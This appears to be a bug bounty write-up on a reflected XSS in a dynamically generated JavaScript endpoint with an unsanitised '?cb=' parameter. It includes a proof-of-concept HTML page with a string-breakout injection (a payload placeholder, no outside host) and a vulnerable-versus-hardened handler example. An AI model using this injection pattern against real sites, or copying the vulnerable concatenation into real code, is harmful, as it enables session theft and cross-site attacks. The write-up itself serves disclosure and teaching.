XSS using a dynamically generated JS file


Severity : High

Complexity: Medium

Weakness: Disclosed JS endpoint & unsanitized user input

— — — — — — — — — — — — — — — — — — — — — — — — — — — —

Discovery :

  • While checking Burp Proxy requests I came across the following JavaScript file:
https://www.site.com/mvcs/kt/tags/pclntny.js
  • I started brute-forcing parameters for the JS endpoint and found ?cb=
  • It takes the user input and appends it to a getScript() call. Since the Content-Type is text/plain, the response is not executed as-is, so we need to find a way to get our input rendered as script.
https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxxxxxxx
  • We know that script includes are not restricted by the SOP and the JS file can be loaded by a cross-domain request. Luckily there was no X-Content-Type-Options: nosniff header either.
Now the task was to find where https://www.site.com/mvcs/kt/tags/pclntny.js is being rendered in HTML/JavaScript under https://www.site.com/
  • I used the Burp Proxy search filter option to look for that endpoint.
Found that it is used in https://www.site.com/user/public/apps/tags?val=pcltny.js:
<script type="text/javascript" src="/mvcs/kt/tags/pclntny.js" />
...
var Doc = uri.queryKey['cb'];

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Exploitation :

  • Simple POC (the injected script tag and the helper script are separate elements, since a <script> with a src attribute ignores its inline body):
<html>
<body>
<script src="https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxx')<PAYLOAD-HERE>;"></script>
<script>
...
window.open('https://www.site.com/user/public/apps/tags?val=pcltny.js', '_blank').focus();
</script>
</body>
</html>
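The root cause above is the ?cb= value being concatenated straight into the generated script. As an added example (not code from the original writeup or from the affected site), here is a Node.js handler in the vulnerable shape the writeup describes next to a hardened version; the names buildScriptUnsafe, buildScriptSafe and CALLBACK_RE are assumed.

```javascript
// Added example (not from the original writeup): generating a script from a
// ?cb= query parameter, first the way the writeup describes, then hardened.
// Function and constant names here are assumptions, not the site's own code.

// A JSONP-style callback only ever needs to be a plain identifier.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

// Vulnerable: the raw query value is concatenated into the JS body, so a value
// like  xxxx');injected();//  closes the string literal and appends statements.
function buildScriptUnsafe(cb) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/plain' },
    body: `getScript('${cb}');`,
  };
}

// Hardened: reject anything that is not an identifier, build the body from the
// validated value only, and serve it as JavaScript with nosniff so the browser
// never has to guess the type of the response.
function buildScriptSafe(cb) {
  const baseHeaders = { 'X-Content-Type-Options': 'nosniff' };
  if (typeof cb !== 'string' || !CALLBACK_RE.test(cb)) {
    return {
      status: 400,
      headers: { ...baseHeaders, 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: { ...baseHeaders, 'Content-Type': 'application/javascript; charset=utf-8' },
    // JSON.stringify yields a properly quoted JS string literal.
    body: `getScript(${JSON.stringify(cb)});`,
  };
}
```

With the hardened handler the breakout string from the POC gets a 400 instead of a script body, and a legitimate callback name is emitted as a quoted literal.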

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

  • Able to bypass their cross-domain policy by injecting AJAX requests.

Tools: https://github.com/maK-/parameth for checking parameters.

Reference :

Nice little bounty!